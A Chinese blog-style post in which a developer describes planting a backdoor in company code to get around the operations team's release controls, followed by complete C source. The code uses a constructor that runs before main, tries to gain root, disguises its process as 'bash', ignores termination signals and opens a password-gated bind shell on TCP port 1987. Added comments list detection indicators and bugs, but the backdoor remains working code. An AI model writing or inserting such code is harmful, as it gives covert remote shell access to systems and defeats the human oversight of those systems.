今天忽然萌生一个邪恶的想法,公司上线流程极其繁琐,是不是可以考虑自己上线呢。之前自己搞过提权上线,但是并不是每台机器都有漏洞的,新机器漏洞补的比较勤,难以提权。
OP有权限操作线上机器,RD木有权限,但是RD有写代码的权限,如果给我们的代码加上一个后门就可以自由上线了,规避OP的限制。
代码极其简单,修改了一下xbind,主要增加了信号处理函数、使用attribute指定main前运行、设置进程名。现在遗憾的是没有搞定进程title,如果搞定进程title就可以以假乱真了。
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/prctl.h>

/* Prompt written to every accepted connection.  The misspelling ("Enert")
 * is a fixed byte sequence on the wire and therefore a usable network
 * signature; the trailing "\0" is never sent because the write() below
 * uses strlen(), which stops at the first NUL. */
#define ENTERPASS "Enert your password: \0"
/* Banner written after the password check passes. */
#define WELCOME "Welcome to shell\r\nlet's do it:\r\n"
/* Credential compiled into the binary; recoverable from the built object
 * with `strings`.  Note the check below compares only its first 5 bytes. */
#define PASSWORD "123abc!@#"
/* Fixed TCP listen port, bound on all interfaces -- a static indicator for
 * host and network monitoring. */
#define PORT 1987
/*
 * init_backdoor - constructor that plants a password-gated bind shell.
 *
 * __attribute__((constructor)) makes the loader run this before main(),
 * so it fires in whatever executable or shared object it is compiled into,
 * independent of that program's own control flow.  The author's stated aim
 * (text above the listing) is to bypass the release/ops process.
 *
 * Observable behaviour, useful for detection:
 *  - a forked child detached from the host program that ignores SIGINT,
 *    SIGPIPE and SIGTERM; its comm name is "bash" but /proc/<pid>/exe and
 *    /proc/<pid>/cmdline still name the real binary;
 *  - a TCP listener on PORT bound to INADDR_ANY;
 *  - the fixed prompt ENTERPASS sent on every accepted connection;
 *  - on a matching password, /bin/sh exec'd with the socket as its
 *    stdin/stdout/stderr, running with the host process's privileges.
 *
 * Returns 0 in the parent (the host program continues unchanged); the
 * forked listener never returns -- it exits on error or loops forever.
 */
__attribute__((constructor))
int init_backdoor()
{
    struct sockaddr_in s_addr;
    struct sockaddr_in c_addr;
    char buf[1024] = {0};
    pid_t pid = 0;
    /* `i` is never used.  c_addrsize is an int but is passed where accept()
     * expects a socklen_t *, a pointer-type mismatch. */
    int i = 0,sock_descriptor = 0,temp_sock_descriptor = 0,c_addrsize = 0;

    /* Attempt to become root.  Return values are ignored, so in an
     * unprivileged host process these fail silently and the shell exec'd
     * below simply inherits whatever uid/gid the host has. */
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);

    /* The parent returns immediately so the host program starts normally;
     * only the child continues into the listener below. */
    pid = fork();
    if(pid)
        return 0;

    /* Make the listener resistant to the usual termination signals;
     * SIGKILL is unaffected. */
    signal(SIGINT, SIG_IGN);
    signal(SIGPIPE, SIG_IGN);
    signal(SIGTERM, SIG_IGN);
    /* proc_title is declared but never used (the post notes the process
     * title was not changed).  PR_SET_NAME rewrites only the 16-byte comm
     * field (/proc/<pid>/comm, `ps -o comm`); argv[0] and /proc/<pid>/exe
     * are untouched, which is how the disguise is spotted. */
    const char *proc_title = "bash";
    const char *proc_name = "bash";
    prctl(PR_SET_NAME, proc_name);

    /* socket() is called twice: the first fd is kept, the second is the
     * one checked and is then leaked, so sock_descriptor itself is never
     * validated.  All diagnostic printf calls are commented out, so a
     * failure leaves nothing in the host program's output. */
    sock_descriptor=socket(AF_INET,SOCK_STREAM,0);
    if (socket(AF_INET,SOCK_STREAM,0)==-1){
        //printf("socket failed!");
        exit(1);
    }
    memset(&s_addr,0,sizeof(s_addr));
    //bzero(&s_addr,sizeof(s_addr));
    s_addr.sin_family=AF_INET;
    /* INADDR_ANY: reachable from every interface, not just loopback. */
    s_addr.sin_addr.s_addr=htonl(INADDR_ANY);
    s_addr.sin_port=htons(PORT);
    if (bind(sock_descriptor,(struct sockaddr *)&s_addr,sizeof(s_addr))==-1){
        //printf("bind failed!");
        exit(1);
    }
    if (listen(sock_descriptor,20)==-1) /* backlog of 20 pending connections */
    {
        //printf("listen failed!");
        exit(1);
    }
    c_addrsize=sizeof(c_addr);

    while(1)
    {
        temp_sock_descriptor=accept(sock_descriptor,(struct sockaddr *)&c_addr,&c_addrsize);
        /* accept() returns -1 on failure, which is truthy, so an error also
         * enters the loop below and forks a handler for an invalid fd. */
        while(temp_sock_descriptor)
        {
            /* One handler process per connection; the parent closes its
             * copy of the fd and returns to accept(). */
            pid=fork();
            if (pid>0) {
                close(temp_sock_descriptor);
                temp_sock_descriptor = 0;
                continue;
            }else if (pid==0){
                /* strlen() stops at the embedded '\0' in ENTERPASS, so only
                 * the text before it is sent. */
                write(temp_sock_descriptor, ENTERPASS, strlen(ENTERPASS));
                memset(buf, '\0', 1024);
                /* Return value unchecked: a closed or empty connection leaves
                 * buf all zero, which fails the comparison below. */
                recv(temp_sock_descriptor, buf, 1024, 0);

                /* Only the first 5 bytes of the 9-byte PASSWORD are compared,
                 * so the gate is weaker than the macro suggests. */
                if (strncmp(buf,PASSWORD,5) !=0){
                    close(temp_sock_descriptor);
                    temp_sock_descriptor = 0;
                    exit(1);
                }

                write(temp_sock_descriptor, WELCOME, strlen(WELCOME));
                /* Wire the socket to stdin/stdout/stderr and replace this
                 * process with a shell.  The result is an interactive
                 * /bin/sh whose parent is the disguised listener -- a strong
                 * indicator in process-tree audits. */
                dup2(temp_sock_descriptor,0);
                dup2(temp_sock_descriptor,1);
                dup2(temp_sock_descriptor,2);
                execl("/bin/sh", "sh", (char *) 0);
                /* Reached only if execl() fails. */
                close(temp_sock_descriptor);
                temp_sock_descriptor = 0;
                exit(0);

            }else{
                /* fork() failed. */
                exit(1);
            }
        }
    }

    /* Unreachable: the accept loop above never terminates. */
    close(sock_descriptor);
    return 0;
}